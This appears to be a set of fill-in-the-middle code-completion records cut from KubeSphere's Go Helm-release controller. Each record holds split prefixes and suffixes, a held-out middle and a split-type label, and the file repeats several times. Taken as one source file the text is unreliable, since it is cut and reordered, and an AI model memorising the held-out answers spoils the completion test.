// \ ^ / |
// \ | /======> /
// \=>failed<==========================
// Reconcile reads that state of the cluster for a helmreleases object and makes changes based on the state read
// and what is in the helmreleases.Spec
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases,verbs=get;list;watch;create;update;patch;delete
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases/status,verbs=get;update;patch
func (r *ReconcileHelmRelease) Reconcile(request reconcile.Request) (reconcile.Result, error) {
// Fetch the helmReleases instance
instance := &v1alpha1.HelmRelease{}
err := r.Get(context.TODO(), request.NamespacedName, instance)
if err != nil {
if apierrors.IsNotFound(err) {
// Object not found, return. Created objects are automatically garbage collected.
// For additional cleanup logic use finalizers.
return reconcile.Result{}, nil
}
// Error reading the object - requeue the request.
return reconcile.Result{}, err
}
if instance.Status.State == "" {
instance.Status.State = v1alpha1.HelmStatusCreating
instance.Status.LastUpdate = metav1.Now()
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
}
if instance.ObjectMeta.DeletionTimestamp.IsZero() {
// The object is not being deleted, so if it does not have our finalizer,
// then lets add the finalizer and update the object.
if !sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
clusterName := instance.GetRlsCluster()
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
// cluster not exists, delete the crd
klog.Warningf("cluster %s not found, delete the helm release %s/%s",
clusterName, instance.GetRlsNamespace(), instance.GetTrueName())
return reconcile.Result{}, r.Delete(context.TODO(), instance)
}
// The host cluster is self-healing; deleting the host cluster won't cause deletion of the helm release
if !r.clusterClients.IsHostCluster(clusterInfo) {
// add owner References
instance.OwnerReferences = append(instance.OwnerReferences, metav1.OwnerReference{
APIVersion: clusterv1alpha1.SchemeGroupVersion.String(),
Kind: clusterv1alpha1.ResourceKindCluster,
Name: clusterInfo.Name,
UID: clusterInfo.UID,
})
}
}
instance.ObjectMeta.Finalizers = append(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer)
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
} else {
// The object is being deleting
if sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
klog.V(3).Infof("helm uninstall %s/%s from host cluster", instance.GetRlsNamespace(), instance.Spec.Name)
err := r.uninstallHelmRelease(instance)
if err != nil {
return reconcile.Result{}, err
}
klog.V(3).Infof("remove helm release %s finalizer", instance.Name)
// remove finalizer
instance.ObjectMeta.Finalizers = sliceutil.RemoveString(instance.ObjectMeta.Finalizers, func(item string) bool {
if item == HelmReleaseFinalizer {
return true
}
return false
})
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
}
return reconcile.Result{}, nil
}
return r.reconcile(instance)
}
// Check the state of the instance then decide what to do.
func (r *ReconcileHelmRelease) reconcile(instance *v1alpha1.HelmRelease) (reconcile.Result, error) {
if instance.Status.State == v1alpha1.HelmStatusActive && instance.Status.Version == instance.Spec.Version {
// todo check release status
return reconcile.Result{}, nil
}
ft := failedTimes(instance.Status.DeployStatus)
if v1alpha1.HelmStatusFailed == instance.Status.State && ft > 0 {
// failed too much times, exponential backoff, max delay 180s
retryAfter := time.Duration(math.Min(math.Exp2(float64(ft)), 180)) * time.Second
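// e.g. 3 failures -> 8s, 5 failures -> 32s; from 8 failures on the 180s cap applies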
var lastDeploy time.Time
if instance.Status.LastDeployed != nil {
lastDeploy = instance.Status.LastDeployed.Time
} else {
lastDeploy = instance.Status.LastUpdate.Time
}
if time.Now().Before(lastDeploy.Add(retryAfter)) {
return reconcile.Result{RequeueAfter: retryAfter}, nil
}
}
var err error
switch instance.Status.State {
case v1alpha1.HelmStatusDeleting:
// no operation
return reconcile.Result{}, nil
case v1alpha1.HelmStatusActive:
// Release used to be active, but instance.Status.Version not equal to instance.Spec.Version
instance.Status.State = v1alpha1.HelmStatusUpgrading
// Update the state first.
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
case v1alpha1.HelmStatusCreating:
// create new release
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusFailed:
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusUpgrading:
// We can update the release now.
err = r.createOrUpgradeHelmRelease(instance, true)
case v1alpha1.HelmStatusRollbacking:
// TODO: rollback helm release
}
now := metav1.Now()
var deployStatus v1alpha1.HelmReleaseDeployStatus
if err != nil {
instance.Status.State = v1alpha1.HelmStatusFailed
instance.Status.Message = stringutils.ShortenString(err.Error(), v1alpha1.MsgLen)
deployStatus.Message = instance.Status.Message
deployStatus.State = v1alpha1.HelmStatusFailed
} else {
instance.Status.State = v1alpha1.StateActive
instance.Status.Message = ""
instance.Status.Version = instance.Spec.Version
deployStatus.State = v1alpha1.HelmStatusSuccessful
}
deployStatus.Time = now
instance.Status.LastUpdate = now
instance.Status.LastDeployed = &now
if len(instance.Status.DeployStatus) > 0 {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus}, instance.Status.DeployStatus...)
// At most ten records will be saved.
if len(instance.Status.DeployStatus) >= 10 {
instance.Status.DeployStatus = instance.Status.DeployStatus[:10:10]
}
} else {
instance.Status.DeployStatus = []v1alpha1.HelmReleaseDeployStatus{deployStatus}
}
err = r.Status().Update(context.TODO(), instance)
if err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
func failedTimes(status []v1alpha1.HelmReleaseDeployStatus) int {
count := 0
for i := range status {
if status[i].State == v1alpha1.HelmStatusFailed {
count += 1
}
}
return count
}
func (r *ReconcileHelmRelease) createOrUpgradeHelmRelease(rls *v1alpha1.HelmRelease, upgrade bool) error {
var chartData []byte
var err error
_, chartData, err = r.GetChartData(rls)
if err != nil {
return err
}
if len(chartData) == 0 {
klog.Errorf("empty chart data failed, release name %s, chart name: %s", rls.Name, rls.Spec.ChartName)
return ErrAppVersionDataIsEmpty
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
if r.MultiClusterEnable && clusterName != "" {
clusterConfig, err = r.clusterClients.GetClusterKubeconfig(clusterName)
if err != nil {
klog.Errorf("get cluster %s config failed", clusterConfig)
return err
}
}
// If clusterConfig is empty, this application will be installed in current host.
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name,
// We just add kubesphere.io/creator annotation now.
helmwrapper.SetAnnotations(map[string]string{constants.CreatorAnnotationKey: rls.GetCreator()}),
helmwrapper.SetMock(r.helmMock))
var res helmwrapper.HelmRes
if upgrade {
res, err = hw.Upgrade(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
} else {
res, err = hw.Install(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
}
if err != nil {
return errors.New(res.Message)
}
return nil
}
func (r *ReconcileHelmRelease) | (rls *v1alpha1.HelmRelease) error {
if rls.Status.State != v1alpha1.HelmStatusDeleting {
rls.Status.State = v1alpha1.HelmStatusDeleting
rls.Status.LastUpdate = metav1.Now()
err := r.Status().Update(context.TODO(), rls)
if err != nil {
return err
}
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
var err error
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
klog.V(2).Infof("cluster %s was deleted, skip helm release uninstall", clusterName)
return nil
}
// If the user deletes the helmRelease first and then deletes the cluster immediately, helm resources may leak.
if clusterInfo.DeletionTimestamp != nil {
klog.V(2).Infof("cluster %s is deleting, skip helm release uninstall", clusterName)
return nil
}
clusterConfig = string(clusterInfo.Spec.Connection.KubeConfig)
}
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name, helmwrapper.SetMock(r.helmMock))
res, err := hw.Uninstall()
if err != nil {
return errors.New(res.Message)
}
return nil
}
func (r *ReconcileHelmRelease) SetupWithManager(mgr ctrl.Manager) error {
r.Client = mgr.GetClient()
if r.KsFactory != nil && r.MultiClusterEnable {
r.clusterClients = clusterclient.NewClusterClient(r.KsFactory.Cluster().V1alpha1().Clusters())
}
return ctrl.NewControllerManagedBy(mgr).
For(&v1alpha1.HelmRelease{}).
Complete(r)
}
| uninstallHelmRelease | identifier_name |
helm_release_controller.go | /*
Copyright 2019 The KubeSphere Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package helmrelease
import (
"context"
"errors"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/klog"
"kubesphere.io/kubesphere/pkg/apis/application/v1alpha1"
clusterv1alpha1 "kubesphere.io/kubesphere/pkg/apis/cluster/v1alpha1"
"kubesphere.io/kubesphere/pkg/client/informers/externalversions"
"kubesphere.io/kubesphere/pkg/constants"
"kubesphere.io/kubesphere/pkg/simple/client/openpitrix/helmwrapper"
"kubesphere.io/kubesphere/pkg/simple/client/s3"
"kubesphere.io/kubesphere/pkg/utils/clusterclient"
"kubesphere.io/kubesphere/pkg/utils/sliceutil"
"kubesphere.io/kubesphere/pkg/utils/stringutils"
"math"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/reconcile"
"time"
)
const (
HelmReleaseFinalizer = "helmrelease.application.kubesphere.io"
)
var (
ErrGetRepoFailed = errors.New("get repo failed")
ErrGetAppFailed = errors.New("get app failed")
ErrAppVersionDataIsEmpty = errors.New("app version data is empty")
ErrGetAppVersionFailed = errors.New("get app version failed")
ErrLoadChartFailed = errors.New("load chart failed")
ErrS3Config = errors.New("invalid s3 config")
ErrLoadChartFromStorageFailed = errors.New("load chart from storage failed")
)
var _ reconcile.Reconciler = &ReconcileHelmRelease{}
// ReconcileHelmRelease reconciles a HelmRelease object
type ReconcileHelmRelease struct {
StorageClient s3.Interface
KsFactory externalversions.SharedInformerFactory
client.Client
recorder record.EventRecorder
// mock helm install && uninstall
helmMock bool
informer cache.SharedIndexInformer
clusterClients clusterclient.ClusterClients
MultiClusterEnable bool
}
//
// <==>upgrading===================
// | \
// creating===>active=====>deleting=>deleted |
// \ ^ / |
// \ | /======> /
// \=>failed<==========================
// Reconcile reads the state of the cluster for a HelmRelease object and makes changes based on the state read
// and what is in the helmreleases.Spec
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases,verbs=get;list;watch;create;update;patch;delete
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases/status,verbs=get;update;patch
func (r *ReconcileHelmRelease) Reconcile(request reconcile.Request) (reconcile.Result, error) {
// Fetch the helmReleases instance
instance := &v1alpha1.HelmRelease{}
err := r.Get(context.TODO(), request.NamespacedName, instance)
if err != nil {
if apierrors.IsNotFound(err) {
// Object not found, return. Created objects are automatically garbage collected.
// For additional cleanup logic use finalizers.
return reconcile.Result{}, nil
}
// Error reading the object - requeue the request.
return reconcile.Result{}, err
}
if instance.Status.State == "" {
instance.Status.State = v1alpha1.HelmStatusCreating
instance.Status.LastUpdate = metav1.Now()
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
}
if instance.ObjectMeta.DeletionTimestamp.IsZero() {
// The object is not being deleted, so if it does not have our finalizer,
// then let's add the finalizer and update the object.
if !sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
clusterName := instance.GetRlsCluster()
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
// cluster not exists, delete the crd
klog.Warningf("cluster %s not found, delete the helm release %s/%s",
clusterName, instance.GetRlsNamespace(), instance.GetTrueName())
return reconcile.Result{}, r.Delete(context.TODO(), instance)
}
// The host cluster is self-healing; deleting the host cluster must not cause deletion of the helm release
if !r.clusterClients.IsHostCluster(clusterInfo) {
// add owner References
instance.OwnerReferences = append(instance.OwnerReferences, metav1.OwnerReference{
APIVersion: clusterv1alpha1.SchemeGroupVersion.String(),
Kind: clusterv1alpha1.ResourceKindCluster,
Name: clusterInfo.Name,
UID: clusterInfo.UID,
})
}
}
instance.ObjectMeta.Finalizers = append(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer)
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
} else {
// The object is being deleted
if sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
klog.V(3).Infof("helm uninstall %s/%s from host cluster", instance.GetRlsNamespace(), instance.Spec.Name)
err := r.uninstallHelmRelease(instance)
if err != nil {
return reconcile.Result{}, err
}
klog.V(3).Infof("remove helm release %s finalizer", instance.Name)
// remove finalizer
instance.ObjectMeta.Finalizers = sliceutil.RemoveString(instance.ObjectMeta.Finalizers, func(item string) bool {
if item == HelmReleaseFinalizer {
return true
}
return false
})
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
}
return reconcile.Result{}, nil
}
return r.reconcile(instance)
}
// Check the state of the instance then decide what to do.
func (r *ReconcileHelmRelease) reconcile(instance *v1alpha1.HelmRelease) (reconcile.Result, error) {
if instance.Status.State == v1alpha1.HelmStatusActive && instance.Status.Version == instance.Spec.Version {
// todo check release status
return reconcile.Result{}, nil
}
ft := failedTimes(instance.Status.DeployStatus)
if v1alpha1.HelmStatusFailed == instance.Status.State && ft > 0 {
// failed too many times: exponential backoff, max delay 180s
retryAfter := time.Duration(math.Min(math.Exp2(float64(ft)), 180)) * time.Second
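// e.g. one failure waits 2s, three failures wait 8s; from the 8th failure onward the delay stays at the 180s cap.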
var lastDeploy time.Time
if instance.Status.LastDeployed != nil {
lastDeploy = instance.Status.LastDeployed.Time
} else {
lastDeploy = instance.Status.LastUpdate.Time
}
if time.Now().Before(lastDeploy.Add(retryAfter)) {
return reconcile.Result{RequeueAfter: retryAfter}, nil
}
}
var err error
switch instance.Status.State {
case v1alpha1.HelmStatusDeleting:
// no operation
return reconcile.Result{}, nil
case v1alpha1.HelmStatusActive:
// Release used to be active, but instance.Status.Version is not equal to instance.Spec.Version
instance.Status.State = v1alpha1.HelmStatusUpgrading
// Update the state first.
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
case v1alpha1.HelmStatusCreating:
// create new release
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusFailed:
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusUpgrading:
// We can update the release now.
err = r.createOrUpgradeHelmRelease(instance, true)
case v1alpha1.HelmStatusRollbacking:
// TODO: rollback helm release
}
now := metav1.Now()
var deployStatus v1alpha1.HelmReleaseDeployStatus
if err != nil {
instance.Status.State = v1alpha1.HelmStatusFailed
instance.Status.Message = stringutils.ShortenString(err.Error(), v1alpha1.MsgLen)
deployStatus.Message = instance.Status.Message
deployStatus.State = v1alpha1.HelmStatusFailed
} else {
instance.Status.State = v1alpha1.StateActive
instance.Status.Message = ""
instance.Status.Version = instance.Spec.Version
deployStatus.State = v1alpha1.HelmStatusSuccessful
}
deployStatus.Time = now
instance.Status.LastUpdate = now
instance.Status.LastDeployed = &now
if len(instance.Status.DeployStatus) > 0 {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus}, instance.Status.DeployStatus...)
// At most ten records will be saved.
if len(instance.Status.DeployStatus) >= 10 {
instance.Status.DeployStatus = instance.Status.DeployStatus[:10:10]
}
} else {
instance.Status.DeployStatus = []v1alpha1.HelmReleaseDeployStatus{deployStatus}
}
err = r.Status().Update(context.TODO(), instance)
if err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
func failedTimes(status []v1alpha1.HelmReleaseDeployStatus) int {
count := 0
for i := range status {
if status[i].State == v1alpha1.HelmStatusFailed {
count += 1
}
}
return count
}
func (r *ReconcileHelmRelease) createOrUpgradeHelmRelease(rls *v1alpha1.HelmRelease, upgrade bool) error {
var chartData []byte
var err error
_, chartData, err = r.GetChartData(rls)
if err != nil {
return err
}
if len(chartData) == 0 {
klog.Errorf("empty chart data failed, release name %s, chart name: %s", rls.Name, rls.Spec.ChartName)
return ErrAppVersionDataIsEmpty
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
if r.MultiClusterEnable && clusterName != "" {
clusterConfig, err = r.clusterClients.GetClusterKubeconfig(clusterName)
if err != nil {
klog.Errorf("get cluster %s config failed", clusterConfig)
return err
}
}
// If clusterConfig is empty, this application will be installed in current host.
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name,
// We just add kubesphere.io/creator annotation now.
helmwrapper.SetAnnotations(map[string]string{constants.CreatorAnnotationKey: rls.GetCreator()}),
helmwrapper.SetMock(r.helmMock))
var res helmwrapper.HelmRes
if upgrade {
res, err = hw.Upgrade(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
} else {
res, err = hw.Install(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
}
if err != nil {
return errors.New(res.Message)
}
return nil |
func (r *ReconcileHelmRelease) uninstallHelmRelease(rls *v1alpha1.HelmRelease) error {
if rls.Status.State != v1alpha1.HelmStatusDeleting {
rls.Status.State = v1alpha1.HelmStatusDeleting
rls.Status.LastUpdate = metav1.Now()
err := r.Status().Update(context.TODO(), rls)
if err != nil {
return err
}
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
var err error
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
klog.V(2).Infof("cluster %s was deleted, skip helm release uninstall", clusterName)
return nil
}
// If the user deletes the helmRelease first and then deletes the cluster immediately, helm resources may leak.
if clusterInfo.DeletionTimestamp != nil {
klog.V(2).Infof("cluster %s is deleting, skip helm release uninstall", clusterName)
return nil
}
clusterConfig = string(clusterInfo.Spec.Connection.KubeConfig)
}
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name, helmwrapper.SetMock(r.helmMock))
res, err := hw.Uninstall()
if err != nil {
return errors.New(res.Message)
}
return nil
}
func (r *ReconcileHelmRelease) SetupWithManager(mgr ctrl.Manager) error {
r.Client = mgr.GetClient()
if r.KsFactory != nil && r.MultiClusterEnable {
r.clusterClients = clusterclient.NewClusterClient(r.KsFactory.Cluster().V1alpha1().Clusters())
}
return ctrl.NewControllerManagedBy(mgr).
For(&v1alpha1.HelmRelease{}).
Complete(r)
} | } | random_line_split |
helm_release_controller.go | /*
Copyright 2019 The KubeSphere Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package helmrelease
import (
"context"
"errors"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/klog"
"kubesphere.io/kubesphere/pkg/apis/application/v1alpha1"
clusterv1alpha1 "kubesphere.io/kubesphere/pkg/apis/cluster/v1alpha1"
"kubesphere.io/kubesphere/pkg/client/informers/externalversions"
"kubesphere.io/kubesphere/pkg/constants"
"kubesphere.io/kubesphere/pkg/simple/client/openpitrix/helmwrapper"
"kubesphere.io/kubesphere/pkg/simple/client/s3"
"kubesphere.io/kubesphere/pkg/utils/clusterclient"
"kubesphere.io/kubesphere/pkg/utils/sliceutil"
"kubesphere.io/kubesphere/pkg/utils/stringutils"
"math"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/reconcile"
"time"
)
const (
HelmReleaseFinalizer = "helmrelease.application.kubesphere.io"
)
var (
ErrGetRepoFailed = errors.New("get repo failed")
ErrGetAppFailed = errors.New("get app failed")
ErrAppVersionDataIsEmpty = errors.New("app version data is empty")
ErrGetAppVersionFailed = errors.New("get app version failed")
ErrLoadChartFailed = errors.New("load chart failed")
ErrS3Config = errors.New("invalid s3 config")
ErrLoadChartFromStorageFailed = errors.New("load chart from storage failed")
)
var _ reconcile.Reconciler = &ReconcileHelmRelease{}
// ReconcileHelmRelease reconciles a HelmRelease object
type ReconcileHelmRelease struct {
StorageClient s3.Interface
KsFactory externalversions.SharedInformerFactory
client.Client
recorder record.EventRecorder
// mock helm install && uninstall
helmMock bool
informer cache.SharedIndexInformer
clusterClients clusterclient.ClusterClients
MultiClusterEnable bool
}
//
// <==>upgrading===================
// | \
// creating===>active=====>deleting=>deleted |
// \ ^ / |
// \ | /======> /
// \=>failed<==========================
// Reconcile reads the state of the cluster for a HelmRelease object and makes changes based on the state read
// and what is in the helmreleases.Spec
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases,verbs=get;list;watch;create;update;patch;delete
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases/status,verbs=get;update;patch
func (r *ReconcileHelmRelease) Reconcile(request reconcile.Request) (reconcile.Result, error) {
// Fetch the helmReleases instance
instance := &v1alpha1.HelmRelease{}
err := r.Get(context.TODO(), request.NamespacedName, instance)
if err != nil {
if apierrors.IsNotFound(err) {
// Object not found, return. Created objects are automatically garbage collected.
// For additional cleanup logic use finalizers.
return reconcile.Result{}, nil
}
// Error reading the object - requeue the request.
return reconcile.Result{}, err
}
if instance.Status.State == "" {
instance.Status.State = v1alpha1.HelmStatusCreating
instance.Status.LastUpdate = metav1.Now()
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
}
if instance.ObjectMeta.DeletionTimestamp.IsZero() {
// The object is not being deleted, so if it does not have our finalizer,
// then let's add the finalizer and update the object.
if !sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
clusterName := instance.GetRlsCluster()
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
// cluster not exists, delete the crd
klog.Warningf("cluster %s not found, delete the helm release %s/%s",
clusterName, instance.GetRlsNamespace(), instance.GetTrueName())
return reconcile.Result{}, r.Delete(context.TODO(), instance)
}
// The host cluster is self-healing; deleting the host cluster must not cause deletion of the helm release
if !r.clusterClients.IsHostCluster(clusterInfo) {
// add owner References
instance.OwnerReferences = append(instance.OwnerReferences, metav1.OwnerReference{
APIVersion: clusterv1alpha1.SchemeGroupVersion.String(),
Kind: clusterv1alpha1.ResourceKindCluster,
Name: clusterInfo.Name,
UID: clusterInfo.UID,
})
}
}
instance.ObjectMeta.Finalizers = append(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer)
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
} else {
// The object is being deleted
if sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
klog.V(3).Infof("helm uninstall %s/%s from host cluster", instance.GetRlsNamespace(), instance.Spec.Name)
err := r.uninstallHelmRelease(instance)
if err != nil {
return reconcile.Result{}, err
}
klog.V(3).Infof("remove helm release %s finalizer", instance.Name)
// remove finalizer
instance.ObjectMeta.Finalizers = sliceutil.RemoveString(instance.ObjectMeta.Finalizers, func(item string) bool {
if item == HelmReleaseFinalizer {
return true
}
return false
})
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
}
return reconcile.Result{}, nil
}
return r.reconcile(instance)
}
// Check the state of the instance then decide what to do.
func (r *ReconcileHelmRelease) reconcile(instance *v1alpha1.HelmRelease) (reconcile.Result, error) {
if instance.Status.State == v1alpha1.HelmStatusActive && instance.Status.Version == instance.Spec.Version {
// todo check release status
return reconcile.Result{}, nil
}
ft := failedTimes(instance.Status.DeployStatus)
if v1alpha1.HelmStatusFailed == instance.Status.State && ft > 0 {
// failed too many times: exponential backoff, max delay 180s
retryAfter := time.Duration(math.Min(math.Exp2(float64(ft)), 180)) * time.Second
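// e.g. one failure waits 2s, three failures wait 8s; from the 8th failure onward the delay stays at the 180s cap.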
var lastDeploy time.Time
if instance.Status.LastDeployed != nil {
lastDeploy = instance.Status.LastDeployed.Time
} else {
lastDeploy = instance.Status.LastUpdate.Time
}
if time.Now().Before(lastDeploy.Add(retryAfter)) {
return reconcile.Result{RequeueAfter: retryAfter}, nil
}
}
var err error
switch instance.Status.State {
case v1alpha1.HelmStatusDeleting:
// no operation
return reconcile.Result{}, nil
case v1alpha1.HelmStatusActive:
// Release used to be active, but instance.Status.Version is not equal to instance.Spec.Version
instance.Status.State = v1alpha1.HelmStatusUpgrading
// Update the state first.
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
case v1alpha1.HelmStatusCreating:
// create new release
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusFailed:
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusUpgrading:
// We can update the release now.
err = r.createOrUpgradeHelmRelease(instance, true)
case v1alpha1.HelmStatusRollbacking:
// TODO: rollback helm release
}
now := metav1.Now()
var deployStatus v1alpha1.HelmReleaseDeployStatus
if err != nil {
instance.Status.State = v1alpha1.HelmStatusFailed
instance.Status.Message = stringutils.ShortenString(err.Error(), v1alpha1.MsgLen)
deployStatus.Message = instance.Status.Message
deployStatus.State = v1alpha1.HelmStatusFailed
} else {
instance.Status.State = v1alpha1.StateActive
instance.Status.Message = ""
instance.Status.Version = instance.Spec.Version
deployStatus.State = v1alpha1.HelmStatusSuccessful
}
deployStatus.Time = now
instance.Status.LastUpdate = now
instance.Status.LastDeployed = &now
if len(instance.Status.DeployStatus) > 0 {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus}, instance.Status.DeployStatus...)
// At most ten records will be saved.
if len(instance.Status.DeployStatus) >= 10 {
instance.Status.DeployStatus = instance.Status.DeployStatus[:10:10]
}
} else {
instance.Status.DeployStatus = []v1alpha1.HelmReleaseDeployStatus{deployStatus}
}
err = r.Status().Update(context.TODO(), instance)
if err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
func failedTimes(status []v1alpha1.HelmReleaseDeployStatus) int {
count := 0
for i := range status {
if status[i].State == v1alpha1.HelmStatusFailed {
count += 1
}
}
return count
}
func (r *ReconcileHelmRelease) createOrUpgradeHelmRelease(rls *v1alpha1.HelmRelease, upgrade bool) error {
var chartData []byte
var err error
_, chartData, err = r.GetChartData(rls)
if err != nil {
return err
}
if len(chartData) == 0 {
klog.Errorf("empty chart data failed, release name %s, chart name: %s", rls.Name, rls.Spec.ChartName)
return ErrAppVersionDataIsEmpty
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
if r.MultiClusterEnable && clusterName != "" {
clusterConfig, err = r.clusterClients.GetClusterKubeconfig(clusterName)
if err != nil {
klog.Errorf("get cluster %s config failed", clusterConfig)
return err
}
}
// If clusterConfig is empty, this application will be installed in current host.
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name,
// We just add kubesphere.io/creator annotation now.
helmwrapper.SetAnnotations(map[string]string{constants.CreatorAnnotationKey: rls.GetCreator()}),
helmwrapper.SetMock(r.helmMock))
var res helmwrapper.HelmRes
if upgrade {
res, err = hw.Upgrade(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
} else {
res, err = hw.Install(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
}
if err != nil |
return nil
}
func (r *ReconcileHelmRelease) uninstallHelmRelease(rls *v1alpha1.HelmRelease) error {
if rls.Status.State != v1alpha1.HelmStatusDeleting {
rls.Status.State = v1alpha1.HelmStatusDeleting
rls.Status.LastUpdate = metav1.Now()
err := r.Status().Update(context.TODO(), rls)
if err != nil {
return err
}
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
var err error
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
klog.V(2).Infof("cluster %s was deleted, skip helm release uninstall", clusterName)
return nil
}
// If the user deletes the helmRelease first and then deletes the cluster immediately, helm resources may leak.
if clusterInfo.DeletionTimestamp != nil {
klog.V(2).Infof("cluster %s is deleting, skip helm release uninstall", clusterName)
return nil
}
clusterConfig = string(clusterInfo.Spec.Connection.KubeConfig)
}
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name, helmwrapper.SetMock(r.helmMock))
res, err := hw.Uninstall()
if err != nil {
return errors.New(res.Message)
}
return nil
}
func (r *ReconcileHelmRelease) SetupWithManager(mgr ctrl.Manager) error {
r.Client = mgr.GetClient()
if r.KsFactory != nil && r.MultiClusterEnable {
r.clusterClients = clusterclient.NewClusterClient(r.KsFactory.Cluster().V1alpha1().Clusters())
}
return ctrl.NewControllerManagedBy(mgr).
For(&v1alpha1.HelmRelease{}).
Complete(r)
}
| {
return errors.New(res.Message)
} | conditional_block |
helm_release_controller.go | /*
Copyright 2019 The KubeSphere Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
